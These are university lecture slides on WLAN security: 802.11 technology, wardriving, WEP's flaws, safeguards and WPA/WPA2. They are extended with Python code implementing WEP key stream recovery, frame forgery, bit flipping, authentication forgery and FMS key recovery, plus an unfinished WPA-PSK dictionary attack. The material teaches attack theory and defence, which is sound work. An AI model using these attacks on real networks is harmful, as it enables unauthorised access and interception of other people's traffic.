
WLAN Security - Contents
Wireless LAN Security
Matthew Joyce, Vodafone UK
IY5511-08 WLAN Security

> WLAN Technologies
> Wireless LAN 802.11
  > Technology
  > Security History
  > Vulnerabilities
> Demonstration

WLAN Technologies
> Infrared
> Narrow Band
> Direct Sequence Spread Spectrum
> Frequency Hopping

The ISM Frequency Bands
(Figure: the ISM bands plotted on a frequency axis running from 1 GHz to 100 GHz)
> Selected regional licensing differences:
  > 915 MHz only in the Americas (region 2)
  > 2.4 GHz for global availability (regions 1, 2 and 3)
> Unlicensed spectrum is difficult to come by and usually contested

Multiple Access Methods
(Figure: the three schemes drawn on code, time and frequency axes)
> FDMA: each user is assigned a different frequency, like ordinary radio
> TDMA: multiple users share the same frequency channel sequentially; the time slot sequence repeats over and over
> CDMA (also referred to as spread spectrum): the channel is spread over a wide frequency band; many users share the same frequency band at the same time; each user is assigned a unique code to identify and separate them

Spread Spectrum Communication
> Spread spectrum signals have bandwidths much wider than that of the data they carry
> This provides the signal with substantial immunity to noise and interference, and to fading and multipath
> The use of different basis signals allows many users to exist simultaneously in the same band, hence CDMA

Spread Spectrum Properties
> Spread spectrum signals may be overlaid on existing services (this is the rule, rather than the exception, in the 2.4 GHz ISM band)
> The distinctive signals allow each user to be automatically identified
> The wide bandwidth of the signals allows multipath diversity to be used
> The data rate may be varied to adapt gracefully to changing load conditions

DS and FH Spread Spectrum
(Figure: FH occupies one narrow channel at a time, hopping across the complete allocated waveband; DS occupies the complete waveband continuously)
> Frequency Hopping
  > Sequential use of multiple frequencies
  > Hop sequence and rate will vary
> Direct Sequence
  > Each symbol is transmitted over multiple frequencies at the same time
  > Higher speed than FH at comparable distances
  > System capacity (multiple channels) higher than FH

DSSS Transmitter Schema
(Figure: source and channel coding -> digital signal (bits) -> multiplier X, fed with code bits (chips) from the code generator -> RF modulator; the spectrum widens from the data bandwidth to the spread bandwidth)
> Spreading: the information signal (i.e. a symbol) is multiplied by a unique, high-rate digital code which stretches (spreads) its bandwidth before transmission
> Code bits are called chips
> The sequence is sometimes called a Barker code

DSSS Signal Convolution
(Figure: one data symbol of duration t_s multiplied chip by chip by the 11-chip Barker sequence, chip time t_c; symbol X Barker sequence = result of multiplication)
> Due to the multiplication of a symbol with the Barker code, the rate of change increases by a factor of 11 in this example
> This means that the cycle rate increases from 1 MHz to 11 MHz
> In terms of spectrum this means that after RF modulation the signal is spread from 2 MHz bandwidth to 22 MHz bandwidth

Data and Spread Signal Spectra
(Figure: the narrow information-signal spectrum beside the wide, low-level spread-signal spectrum)

DSSS Receiver Schema
(Figure: RF demodulator -> spread spectrum -> multiplier X, fed with code bits (chips) from a synchronised code generator -> de-spread signal -> channel and source decoding -> digital signal (bits))
> At the receiver, the spread signal is multiplied again by a synchronised replica of the same code, and is de-spread and recovered
> The outcome of the process is the original symbol
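The spreading and de-spreading described on the transmitter and receiver slides, as an added example (not code from the slides): data symbols are multiplied by the 11-chip Barker code, and the receiver correlates each symbol-time window with the same code. It also adds one delayed reflection and some noise to show the echo rejection the de-spreading slide below describes; the echo delay, echo gain and noise level are assumed values chosen for the demonstration.

```python
"""DSSS spreading and de-spreading with the 11-chip Barker code.

Added example, not from the slides. Symbols are +1/-1 and the chip rate is
11x the symbol rate, as on the slides; the echo delay/gain and the noise level
are assumed values chosen to show the multipath rejection of the correlator.
"""
import random

BARKER_11 = [+1, -1, +1, +1, -1, +1, +1, +1, -1, -1, -1]   # 802.11 1/2 Mbps DSSS code
N = len(BARKER_11)


def spread(bits):
    """Multiply each symbol (+1 for a 1 bit, -1 for a 0 bit) by the chip sequence."""
    chips = []
    for bit in bits:
        symbol = 1 if bit else -1
        chips.extend(symbol * c for c in BARKER_11)
    return chips


def add_multipath(chips, delay=3, gain=0.5):
    """Add one delayed, attenuated copy of the signal (a reflection)."""
    out = [float(c) for c in chips] + [0.0] * delay
    for k, c in enumerate(chips):
        out[k + delay] += gain * c
    return out


def add_noise(samples, sigma=0.5, seed=1):
    """Add Gaussian noise from a seeded generator so runs are repeatable."""
    rng = random.Random(seed)
    return [x + rng.gauss(0.0, sigma) for x in samples]


def correlations(samples):
    """Correlate each symbol-time window with the code: ideally +11 or -11.
    Energy arriving between synchronisation points (echoes) is largely
    cancelled because the Barker code's off-peak autocorrelation is at most 1."""
    return [sum(samples[k * N + i] * BARKER_11[i] for i in range(N))
            for k in range(len(samples) // N)]


def despread(samples):
    """Decide each symbol from the sign of its correlation spike."""
    return [1 if c > 0 else 0 for c in correlations(samples)]


if __name__ == "__main__":
    bits = [1, 0, 1, 1, 0, 0, 1, 0]
    rx = add_noise(add_multipath(spread(bits)))
    print(correlations(rx))
    print(despread(rx) == bits)
```

The correlator only samples at the synchronisation points, so the reflection arriving three chips late contributes at most half a unit against a spike of eleven; this is the "fluctuations are largely ignored" behaviour of the next slide.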

De-Spreading
(Figure: correlator output for an 11-chip code, +11 for a 1 symbol and -11 for a 0 symbol, one spike per symbol time)
> When the incoming signal is de-spread, it results in either a positive (+) or a negative (-) spike
> These spikes arrive at intervals equal to the symbol time
> A positive spike represents a 1 symbol, a negative spike represents a 0 symbol

Effects of Reflections/Echoes
(Figure: the correlation peak at the symbol time with smaller echo peaks either side)
> Echoes may arrive at the receiver, so fluctuations can be noticed at positions other than the symbol time boundaries
> These fluctuations are (largely) ignored as the receiver will only interpret the spike at the synchronisation points (separated from each other by the symbol time)

IEEE 802 - The WiFi Context
> IEEE 802 is a collection of standards by IEEE that typically get promulgated to ANSI and ISO standards
  > E.g. IEEE 802.3 specifies the physical and data link layer properties of Ethernet (in its various incarnations)
> IEEE 802.11 is a family of standards for wireless local area networks
  > Baseline IEEE Std 802.11-1997 was approved in June 1997
  > When these slides were written the current standard was IEEE Std 802.11-1999, supplemented by amendment documents (in the sequence a, b, d, g, h, i, j and e) and one corrigendum; the amendments were later consolidated into IEEE Std 802.11-2007 and subsequent revisions
  > IEEE Std 802.11-1999 was reaffirmed by the 802.11 working group in 2003 without changes
  > A recommended practice document for inter-access-point communication (802.11f) was ratified in 2003 but withdrawn in March 2006

Wireless LANs
> IEEE ratified 802.11 in 1997
  > Also known as Wi-Fi
> Wireless LAN at 1 Mbps and 2 Mbps
> WECA (Wireless Ethernet Compatibility Alliance) promoted interoperability
  > Now the Wi-Fi Alliance
> 802.11 provides protocols at Layer 1 and Layer 2 of the OSI model
  > Physical layer
  > Data link layer

802.11 Components
> Two pieces of equipment defined:
  > Wireless station
    > A desktop or laptop PC or PDA with a wireless NIC
  > Access point
    > A bridge between wireless and wired networks
    > Composed of a radio, a wired network interface (usually 802.3) and bridging software
    > Aggregates access for multiple wireless stations to the wired network

802.11 modes
> Infrastructure mode
  > Basic Service Set: one access point
  > Extended Service Set: two or more BSSs forming a single subnet
  > Corporate WLANs operate in this mode
> Ad-hoc mode
  > Also called peer-to-peer
  > Independent Basic Service Set: a set of 802.11 wireless stations that communicate directly without an access point
  > Useful for quick and easy wireless networks

Infrastructure mode / Ad-hoc mode
(Figure: a Basic Service Set (BSS) is a single cell of stations around one access point; an Extended Service Set (ESS) spans multiple cells; an Independent Basic Service Set (IBSS) contains stations only)

802.11 Physical Layer
> Originally three alternative physical layers
  > Two incompatible spread-spectrum radios in the 2.4 GHz ISM band
    > Frequency Hopping Spread Spectrum (FHSS): 79 channels of 1 MHz (US and Europe)
    > Direct Sequence Spread Spectrum (DSSS): 14 channels (11 channels in the US)
  > One diffuse infrared layer
> 802.11 speed: 1 Mbps or 2 Mbps

802.11 Data Link Layer
> Layer 2 split into:
  > Logical Link Control (LLC)
  > Media Access Control (MAC)
> LLC: same 48-bit addresses as 802.3
> MAC: CSMA/CD not possible
  > Can't listen for collisions while transmitting
> CSMA/CA, Collision Avoidance
  > Sender waits for clear air, waits a random time, then sends data
  > Receiver sends an explicit ACK when data arrives intact
  > Also handles interference
  > But adds overhead
  > 802.11 is always slower than the equivalent 802.3

Hidden nodes
(Figure: two stations each within range of the access point but out of range of each other)

RTS / CTS
> To handle hidden nodes
> Sending station sends Request to Send
> Access point responds with Clear to Send
  > All other stations hear this and delay any transmissions
> Only used for larger pieces of data
  > When retransmission may waste significant time

802.11b
> 802.11b ratified in 1999, adding 5.5 Mbps and 11 Mbps
> DSSS as physical layer
> 11 channels (3 non-overlapping)
> Dynamic rate shifting
  > Transparent to higher layers
  > Ideally 11 Mbps
  > Shifts down through 5.5 Mbps and 2 Mbps to 1 Mbps
    > Higher ranges
    > Interference
  > Shifts back up when possible
> Maximum specified range 100 metres
> Average throughput of 4 Mbps

Joining a BSS
> When an 802.11 client enters range of one or more APs
  > APs send beacons
  > AP beacon can include SSID
  > AP chosen on signal strength and observed error rates
  > After AP accepts client, client tunes to AP channel
> Periodically, all channels surveyed
  > To check for stronger or more reliable APs
  > If found, reassociates with new AP

Access Point Roaming
> Reassociation with APs
  > Moving out of range
  > High error rates
  > High network traffic
    > Allows load balancing

Roaming and Channels
(Figure: four adjacent cells on channels 1, 4, 7 and 9)
> Each AP has a channel
  > 14 partially overlapping channels
  > Only three channels have no overlap
  > Best for multicell coverage

802.11a
> 802.11a ratified in 1999 (products shipped from 2001)
> Supports up to 54 Mbps in the 5 GHz range
  > Higher frequency limits the range
  > Regulated frequency reduces interference from other devices
> 12 non-overlapping channels
> Usable range of 30 metres
> Average throughput of 30 Mbps
> Not backwards compatible with 802.11b

802.11g
> 802.11g ratified in 2003
> Supports up to 54 Mbps in the 2.4 GHz range
  > Backwards compatible with 802.11b
> 3 non-overlapping channels
> Range similar to 802.11b
> Average throughput of 30 Mbps
> 802.11n was due in November 2006 when these slides were written, aiming for a maximum of 200 Mbps with an average of 100 Mbps; it was finally ratified in September 2009

Open System Authentication
> Service Set Identifier (SSID)
  > Station must specify SSID to Access Point when requesting association
  > Multiple APs with the same SSID form an Extended Service Set
  > APs can broadcast their SSID
  > Some clients allow * as SSID
    > Associates with the strongest AP regardless of SSID
> Open System Authentication accepts any station that presents the SSID: it identifies the network, it does not authenticate the station, and the SSID is a name, not a secret

MAC ACLs and SSID hiding
> Access points have Access Control Lists (ACL)
  > ACL is a list of allowed MAC addresses
  > E.g. allow access to:
    > 00:01:42:0E:12:1F
    > 00:01:42:F1:72:AE
    > 00:01:42:4F:E2:01
  > But MAC addresses are sniffable and spoofable
> AP beacons without SSID
  > essid_jack (from the AirJack suite) sends deauthenticate frames to a client
  > The SSID is then displayed when the client reassociates, because the probe and association requests it sends carry the SSID in the clear

Interception Range
(Figure: a Basic Service Set, a single cell of about 100 metres around the AP, with a station outside the building perimeter still inside the cell)

Interception
> Wireless LAN uses a radio signal
> Not limited to the physical building
> Signal is weakened by:
  > Walls
  > Floors
  > Interference
> A directional antenna allows interception over longer distances
  > Record is 124 miles for an unamplified 802.11b signal (4 metre dish)

Directional Antenna
> Directional antenna provides focused reception
> DIY plans available
  > Aluminium cake tin
  > Chinese cooking sieve
  > http://www.saunalahti.fi/~elepal/antennie.html
  > http://www.usbwifi.orcon.net.nz/

WarDriving
> Software
  > Netstumbler
  > And many more
> Laptop
  > 802.11a/b/g PC card
> Optional: Global Positioning System
> Logging of MAC address, network name, SSID, manufacturer, channel, signal strength, noise (and, with GPS, location)

WarDriving results
> San Francisco, 2001
  > Maximum 55 miles per hour
  > 1500 Access Points
    > 60% in default configuration
    > Most connected to internal backbones
    > 85% use Open System Authentication
  > Commercial directional antenna
    > 25 mile range from hilltops
  > Peter Shipley - http://www.dis.org/filez/openlans.pdf

WarDriving map
(Figure: map of the access points found; source: www.dis.org/wl/maps/)

Worldwide War Drive 2004
> Fourth and last worldwide war drive
> www.worldwidewardrive.org
> 228,537 Access Points
> 82,755 (35%) with default SSID
> 140,890 (60%) with Open System Authentication
> 62,859 (27%) with both, probably default configuration

Further issues
> Access Point configuration
  > Mixtures of SNMP, web, serial, telnet
  > Default community strings, default passwords
> Evil Twin Access Points
  > Stronger signal, capture user authentication
> Renegade Access Points
  > Unauthorised wireless LANs

War Driving prosecutions
> February 2004, Texas: Stefan Puffer acquitted of wrongful access after showing an unprotected county WLAN to officials
> June 2004, North Carolina, Lowe's DIY store
  > Salcedo convicted for stealing credit card numbers via an unprotected WLAN
  > Botbyl convicted for checking email and web browsing via an unprotected WLAN
> June 2004, Connecticut: Myron Tereshchuk guilty of drive-by extortion via unprotected WLANs
  > "make the check payable to M. Tereshchuk"
> July 2005, London: Gregory Straszkiewicz guilty of dishonestly obtaining a communications service
  > Warwalking in Ealing

802.11b Security Services
> Two security services provided:
  > Authentication: Shared Key Authentication
  > Encryption: Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy
> Shared key between
  > Stations
  > An Access Point
> Extended Service Set
  > All Access Points will have the same shared key
> No key management
  > Shared key entered manually into stations and access points
  > Key management nightmare in large wireless LANs

RC4
> Ron's Code number 4 (Rivest Cipher 4)
  > Symmetric key encryption
  > RSA Security Inc.
  > Designed in 1987
  > Trade secret until leaked in 1994
> RC4 accepts keys from 1 to 256 bytes (8 to 2048 bits); WEP uses a 40-bit or 104-bit secret key prefixed by a 24-bit IV
> RC4 generates a stream of pseudo-random bits
  > XORed with plaintext to create ciphertext

WEP Sending
> Compute Integrity Check Value (ICV)
  > Provides integrity
  > 32-bit Cyclic Redundancy Check (CRC-32)
  > Appended to the message to create the plaintext
> Plaintext encrypted via RC4
  > Provides confidentiality
  > Plaintext XORed with a long key stream of pseudo-random bits
  > Key stream is a function of
    > 40-bit secret key
    > 24-bit initialisation vector
> Ciphertext is transmitted, with the IV sent in the clear in front of it

WEP Encryption
(Figure: IV || secret key -> PRNG (RC4) -> key stream; plaintext || 32-bit CRC, XOR key stream -> ciphertext; the transmitted frame is IV || ciphertext)

WEP Receiving
> Ciphertext is received
> Ciphertext decrypted via RC4
  > Ciphertext XORed with the long key stream of pseudo-random bits
  > Key stream is a function of
    > 40-bit secret key
    > 24-bit initialisation vector (IV), read from the received frame
> Check ICV
  > Separate ICV from message
  > Compute ICV for message
  > Compare with received ICV

Shared Key Authentication
> When a station requests association with an Access Point
  > AP sends a random number (a 128-byte challenge) to the station
  > Station encrypts the random number
    > Uses RC4, 40-bit shared secret key and 24-bit IV
  > Encrypted random number sent to AP
  > AP decrypts the received message
    > Uses RC4, 40-bit shared secret key and 24-bit IV
  > AP compares the decrypted random number to the transmitted random number
  > If the numbers match, the station has the shared secret key
> Caveat: an eavesdropper sees both the challenge and its ciphertext, so one exchange hands over 128 bytes of key stream for that IV, enough to answer a later challenge without knowing the key

WEP Safeguards
> Shared secret key required for:
  > Associating with an access point
  > Sending data
  > Receiving data
> Messages are encrypted
  > Confidentiality
> Messages have a checksum
  > Integrity
> But management traffic is still broadcast in the clear, including the SSID

Initialisation Vector
> IV must be different for every message transmitted
> 802.11 standard doesn't specify how the IV is calculated
> Wireless cards use several methods
  > Some use a simple ascending counter for each message
  > Some switch between alternate ascending and descending counters
  > Some use a pseudo-random IV generator

Passive WEP attack
> If the 24-bit IV is an ascending counter and the Access Point transmits at 11 Mbps, all 2^24 IVs are exhausted in roughly 5 hours
> Passive attack:
  > Attacker collects all traffic
  > Attacker could collect two messages encrypted with the same key and the same IV
  > The key stream cancels: Ciphertext1 XOR Ciphertext2 = Plaintext1 XOR Plaintext2, and statistical attacks then reveal the plaintexts
  > Plaintext XOR Ciphertext = Keystream

Active WEP attack
> If the attacker knows a plaintext and ciphertext pair
  > Keystream is known
  > Attacker can create correctly encrypted messages
  > Access Point is deceived into accepting messages
> Bit flipping
  > Flip a bit in the ciphertext
  > The bit difference in the CRC-32 can be computed, because CRC-32 is linear, so the ICV is patched without knowing the plaintext or the key
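The WEP sending and receiving steps, the shared key authentication exchange and the passive and active attacks of the preceding slides, as one added worked example (not code from the slides or from any tool). Frame layout follows 802.11-1999 WEP (IV, key-id byte, then RC4 over data plus CRC-32 ICV); the 40-bit key, IV and messages are constructed for the demo.

```python
"""WEP encapsulation and the attacks that follow from it.

Added example, not code from the slides. Frame layout follows 802.11-1999
WEP: IV (3 bytes) || key-id byte || RC4_{IV || secret}(data || CRC-32 ICV).
The 40-bit key, IV and messages used below are constructed for the demo.
"""
import struct
import zlib


def rc4(key, length):
    """RC4 key stream of `length` bytes: key scheduling (KSA) then PRGA."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP Integrity Check Value: CRC-32 of the data, little-endian."""
    return struct.pack("<I", zlib.crc32(data))


def wep_encrypt(secret, iv, data, key_id=0):
    """Sender: append the ICV, XOR with RC4(IV || secret), send the IV in the clear."""
    plaintext = data + icv(data)
    return iv + bytes([key_id]) + xor(plaintext, rc4(iv + secret, len(plaintext)))


def wep_decrypt(secret, frame):
    """Receiver: regenerate the key stream from the frame's IV; return the
    data if the ICV verifies, otherwise None (frame discarded)."""
    iv, body = frame[:3], frame[4:]
    plaintext = xor(body, rc4(iv + secret, len(body)))
    data, received_icv = plaintext[:-4], plaintext[-4:]
    return data if received_icv == icv(data) else None


def xor_of_plaintexts(frame_a, frame_b):
    """Passive attack: two frames under the same IV share a key stream, so
    C1 ^ C2 = P1 ^ P2 and the key stream drops out."""
    assert frame_a[:3] == frame_b[:3], "need an IV collision"
    return xor(frame_a[4:], frame_b[4:])


def recover_keystream(frame, known_data):
    """Active attack: known plaintext XOR ciphertext = key stream for this IV."""
    return xor(frame[4:], known_data + icv(known_data))


def forge_frame(iv, keystream, data, key_id=0):
    """Encrypt a chosen message under a recovered key stream; no key needed."""
    plaintext = data + icv(data)
    assert len(keystream) >= len(plaintext), "need more key stream"
    return iv + bytes([key_id]) + xor(plaintext, keystream)


def flip_bits(frame, delta):
    """Flip the bits of `delta` in the encrypted data and patch the ICV.
    CRC-32 is linear: crc(m ^ d) = crc(m) ^ crc(d) ^ crc(0...0), so the ICV
    correction depends only on `delta`, not on the unknown plaintext."""
    data_len = len(frame) - 4 - 4
    assert len(delta) == data_len
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(data_len))
    return frame[:4] + xor(frame[4:], delta + struct.pack("<I", icv_delta))


def station_auth_response(secret, iv, challenge):
    """Legitimate station: the 128-byte challenge arrives in the clear and
    goes back WEP-encrypted; both frames are visible to an eavesdropper."""
    return wep_encrypt(secret, iv, challenge)


def forge_auth_response(observed_challenge, observed_response, new_challenge):
    """Eavesdropper: key stream from one observed exchange answers any later
    challenge under the same IV, without ever learning the secret key."""
    keystream = recover_keystream(observed_response, observed_challenge)
    return forge_frame(observed_response[:3], keystream, new_challenge)


if __name__ == "__main__":
    secret, iv = bytes.fromhex("0102030405"), b"\x00\x00\x01"   # constructed
    frame = wep_encrypt(secret, iv, b"hello world")
    print("round trip :", wep_decrypt(secret, frame))
    print("bit flipped:", wep_decrypt(secret, flip_bits(frame, b"\x20" + bytes(10))))
    chal = bytes(range(128))
    resp = station_auth_response(secret, iv, chal)
    print("forged auth:", wep_decrypt(secret, forge_auth_response(chal, resp, bytes(128))) == bytes(128))
```

Every attack function takes only what is on the air (IV, ciphertext, and plaintext the attacker already knows, such as a SNAP header or the authentication challenge); none of them uses the secret key, which is the whole point.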

Limited WEP keys
> Some vendors allow limited WEP keys
  > User types in a passphrase
  > WEP key is generated from the passphrase
  > The passphrase generator creates only 21 bits of entropy in the 40-bit key
  > Reduces key strength to 21 bits = 2,097,152 keys
  > Remaining 19 bits are predictable
  > A 21-bit key can be brute forced in minutes
> www.lava.net/~newsham/wlan/wep_password_cracker.ppt

Brute force key attack
> Capture ciphertext
  > IV is included in the message
> Search all 2^40 possible secret keys
  > 1,099,511,627,776 keys
  > ~170 days on a laptop of the time
> Find which key decrypts the ciphertext to plaintext (the ICV check tells you when the key is right)

128-bit WEP
> Vendors have extended WEP to 128-bit keys
  > 104-bit secret key
  > 24-bit IV
> Brute force takes 10^19 years for a 104-bit key
> Effectively safeguards against brute force attacks, but not against the key stream and key scheduling attacks that follow, which cost the same for 104-bit keys

Key Scheduling Weakness
> Paper from Fluhrer, Mantin and Shamir, 2001
> Two weaknesses:
  > Certain keys leak into the key stream
    > Invariance weakness
  > If a portion of the PRNG input is exposed,
    > Analysis of the initial key stream allows the key to be determined
    > IV weakness

IV weakness
> WEP exposes part of the PRNG input
  > IV is transmitted with the message
> Every wireless frame has a reliable first byte
  > Sub-Network Access Protocol (SNAP) header, used in the logical link control layer, the upper sub-layer of the data link layer
  > First byte is 0xAA
> Attack is:
  > Capture packets with weak IVs
  > First byte of ciphertext XOR 0xAA = first byte of key stream
  > Can determine the key from the initial key stream
  > Practical for 40-bit and 128-bit keys
> Passive attack
  > Non-intrusive
  > No warning

Wepcrack
> First tool to demonstrate the attack using the IV weakness
  > Open source, Anton Rager
> Three components
  > Weak IV generator
  > Search sniffer output for weak IVs and record the 1st byte
  > Cracker to combine weak IVs and selected 1st bytes
> Cumbersome

Airsnort
> Automated tool
  > Cypher42, Minnesota, USA
  > Does it all!
  > Sniffs
  > Searches for weak IVs
  > Records encrypted data
  > Until the key is derived
> 100 MB to 1 GB of transmitted data
> 3 to 4 hours on a very busy WLAN
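The IV weakness attack of the preceding slides, as an added simulation (not code from the slides, Wepcrack or Airsnort): frames with the FMS weak IVs (B+3, 255, x) are "captured" as (IV, first ciphertext byte) pairs, the first key stream byte is recovered through the known SNAP byte 0xAA, and each secret key byte is obtained by voting over the weak IVs for that byte. The 40-bit key is constructed; the weak-IV class and the resolved-state test are the ones from the FMS paper.

```python
"""Simulation of the Fluhrer-Mantin-Shamir (FMS) weak-IV attack on WEP.

Added example, not the slides' or any tool's code. A 40-bit secret key is
chosen, frames with the FMS weak IVs (B+3, 255, x) are 'captured' (only the IV
and the first ciphertext byte are needed), and the key is recovered byte by
byte by voting, using the known SNAP first plaintext byte 0xAA.
"""
from collections import Counter

SNAP_FIRST_BYTE = 0xAA          # LLC/SNAP DSAP: first plaintext byte of every data frame


def rc4_ksa(key, steps=256):
    """RC4 key scheduling, stopped after `steps` iterations; returns (S, j)."""
    s = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s, j


def rc4_first_byte(key):
    """First PRGA output byte: i = 1, j = S[1], swap, emit S[S[1] + S[j]]."""
    s, _ = rc4_ksa(key)
    j = s[1]
    s[1], s[j] = s[j], s[1]
    return s[(s[1] + s[j]) & 0xFF]


def capture_weak_iv_frames(secret_key):
    """Constructed capture: (IV, first ciphertext byte) for every IV of the
    form (B+3, 255, x), as a sniffer filtering for weak IVs would record."""
    frames = []
    for b in range(len(secret_key)):
        for x in range(256):
            iv = bytes([b + 3, 255, x])
            frames.append((iv, rc4_first_byte(iv + secret_key) ^ SNAP_FIRST_BYTE))
    return frames


def fms_vote(frames, known, b):
    """Vote for secret-key byte b, given the IV and the bytes already recovered.

    Run the KSA only as far as the key is known (n = b+3 steps). The IV is
    'resolved' when S[1] < n and S[1] + S[S[1]] == n; then, with probability
    about 5%, the first key stream byte z equals S[n] after step n, so
    K[n] = index(z) - j - S[n] (mod 256). Unresolved states vote randomly."""
    votes = Counter()
    n = b + 3
    for iv, c0 in frames:
        if iv[0] != n or iv[1] != 255:
            continue
        s, j = rc4_ksa(iv + known, steps=n)
        if s[1] >= n or (s[1] + s[s[1]]) & 0xFF != n:
            continue
        z = c0 ^ SNAP_FIRST_BYTE              # first key stream byte, via SNAP
        votes[(s.index(z) - j - s[n]) & 0xFF] += 1
    return votes


def fms_recover_key(frames, key_len=5, depth=3):
    """Recover the secret key; back-track over the top-`depth` candidates per
    byte and verify each full guess against captured first bytes."""
    def verify(key):
        return all(rc4_first_byte(iv + key) ^ SNAP_FIRST_BYTE == c0
                   for iv, c0 in frames[:32])

    def search(known):
        if len(known) == key_len:
            return known if verify(known) else None
        for cand, _ in fms_vote(frames, known, len(known)).most_common(depth):
            found = search(known + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


if __name__ == "__main__":
    secret = bytes.fromhex("0102030405")        # constructed 40-bit key
    recovered = fms_recover_key(capture_weak_iv_frames(secret))
    print(secret.hex(), "->", recovered.hex())
```

With all 256 IVs of one weak class per key byte the correct byte collects roughly 13 votes against about one for each wrong candidate, which is why Airsnort needed only a few million frames rather than a key search; the same loop extends to a 104-bit key by raising `key_len` to 13 and capturing the classes (16, 255, x) onwards, which is the "practical for 128-bit keys" point on the slide.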

Avoid the weak IVs
> FMS described a simple method to find weak IVs
> Many manufacturers avoid those IVs after 2002
> Therefore Airsnort and others may not work on recent hardware
> However David Hulton, aka h1kari,
  > Properly implemented the FMS attack, which shows many more weak IVs
  > Identified IVs that leak into the second byte of the key stream
  > The second byte of the SNAP header is also 0xAA
  > So the attack still works on recent hardware
  > And is faster on older hardware
> Dwepcrack, weplab, aircrack

Generating WEP traffic
> Not capturing enough traffic?
  > Capture encrypted ARP request packets
    > Anecdotally, lengths of 68, 118 and 368 bytes appear appropriate
  > Replay the encrypted ARP packets to generate encrypted ARP replies; WEP has no replay protection, so the AP accepts them and each reply carries a fresh IV
  > Aireplay implements this

802.11 safeguards
> Security Policy and Architecture Design
> Treat as untrusted LAN
> Discover unauthorised use
> Access point audits
> Station protection
> Access point location
> Antenna design

Security Policy and Architecture
> Define use of the wireless network
  > What is allowed
  > What is not allowed
> Holistic architecture and implementation
  > Consider all threats
  > Design the entire architecture to minimise risk

Wireless as untrusted LAN
> Treat wireless as untrusted
  > Similar to the Internet
> Firewall between WLAN and backbone
> Extra authentication required
> Intrusion detection at the WLAN / backbone junction
> Vulnerability assessments

Discover unauthorised use
> Search for unauthorised access points, ad-hoc networks or clients
> Port scanning
  > For unknown SNMP agents
  > For unknown web or telnet interfaces
> Warwalking!
> Sniff 802.11 packets
  > Identify IP addresses
  > Detect signal strength
  > But may sniff your neighbours
> Wireless Intrusion Detection
  > AirMagnet, AirDefense, Trapeze, Aruba, ...

Access point audits
> Review security of access points
  > Are passwords and community strings secure?
> Use firewalls and router ACLs
  > Limit use of access point administration interfaces
> Standard access point config:
  > SSID
  > WEP keys
  > Community string and password policy

Station protection
> Personal firewalls
  > Protect the station from attackers
> VPN from station into Intranet
  > End-to-end encryption into the trusted network
  > But consider roaming issues
> Host intrusion detection
  > Provide early warning of intrusions onto a station
> Configuration scanning
  > Check that stations are securely configured

Location of Access Points
> Ideally locate access points in the centre of buildings
> Try to avoid access points
  > By windows
  > On external walls
  > With line of sight to outside
> Use directional antennas to point the radio signal

Wireless IDS/IPS
> Sensors deployed in the WLAN
> Monitoring to detect
  > Unauthorised clients by MAC address
    > Accidental
    > Malicious
  > Ad-hoc mode networks
  > Unauthorised access points
  > Policy violations
> Possible to identify approximate locations

WPA
> Wi-Fi Protected Access
> Works with 802.11b, a and g
> Fixes WEP's problems
> Existing hardware can be used
> 802.1X user-level authentication
> TKIP
  > RC4 session-based dynamic encryption keys
  > Per-packet key derivation
  > Unicast and broadcast key management
  > New 48-bit IV with a new sequencing method (replay protection)
  > Michael 8-byte message integrity code (MIC)
> Optional AES support to replace RC4

WPA and 802.1X
> 802.1X is a general purpose network access control mechanism
> WPA has two modes
  > Pre-shared key mode (WPA-PSK), uses pre-shared keys
  > Enterprise mode, uses Extensible Authentication Protocol (EAP) with a RADIUS server making the authentication decision
> EAP is a transport for authentication, not authentication itself
> EAP allows arbitrary authentication methods
> For example, Windows supports
  > EAP-TLS, requiring client and server certificates
  > PEAP-MS-CHAPv2

Practical WPA attacks
> Dictionary attack on pre-shared key mode
  > CoWPAtty, Joshua Wright
  > Offline: the four-way handshake is captured once (a deauthentication frame forces a client to repeat it) and every candidate passphrase is tried against it
> Denial of service attack (TKIP countermeasures)
  > If WPA equipment sees two packets with invalid MICs within 60 seconds
  > All clients are disassociated
  > All activity stopped for one minute
  > Two malicious packets a minute are enough to stop a wireless network

802.11i (WPA2)
> Robust Security Network extends WPA
> Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)
  > Based on a mode of AES, with 128-bit keys and a 48-bit packet number serving as the IV
> Also adds dynamic negotiation of authentication and encryption algorithms
  > Allows for future change
> Does require new hardware
> Lots more info
  > www.drizzle.com/~aboba/ieee/

Relevant RFCs
> RADIUS Extensions: RFC 2869
> EAP: RFC 2284 (since obsoleted by RFC 3748)
> EAP-TLS: RFC 2716 (since obsoleted by RFC 5216)

Demonstration
> War driving
> Packet sniffing
> Cracking WEP
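The pre-shared key dictionary attack from the Practical WPA attacks slide, as an added example (not coWPAtty's code or the slides'). The key derivation is the 802.11i construction: PBKDF2-HMAC-SHA1 over the passphrase salted with the SSID gives the PMK, the PRF over the two MAC addresses and two nonces gives the PTK, and the first 16 bytes of the PTK (the KCK) key the MIC on EAPOL-Key message 2. The SSID, MAC addresses, nonces, EAPOL frame and passphrase below are constructed for the demo, and the EAPOL-Key layout is abbreviated.

```python
"""Offline dictionary attack on WPA/WPA2-PSK, the attack coWPAtty implements.

Added example, not from the slides. Key derivation follows 802.11i:
PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32); PTK = PRF(PMK, ...);
KCK = PTK[0:16]; the EAPOL-Key MIC is an HMAC over message 2 with the MIC
field zeroed. The SSID, MACs, nonces and EAPOL frame below are constructed.
"""
import hashlib
import hmac

SSID = "CorpWLAN"                                  # constructed
AP_MAC = bytes.fromhex("00114200aa01")             # constructed
STA_MAC = bytes.fromhex("000142f172ae")            # constructed
ANONCE = bytes(range(32))                          # constructed
SNONCE = bytes(range(32, 64))                      # constructed


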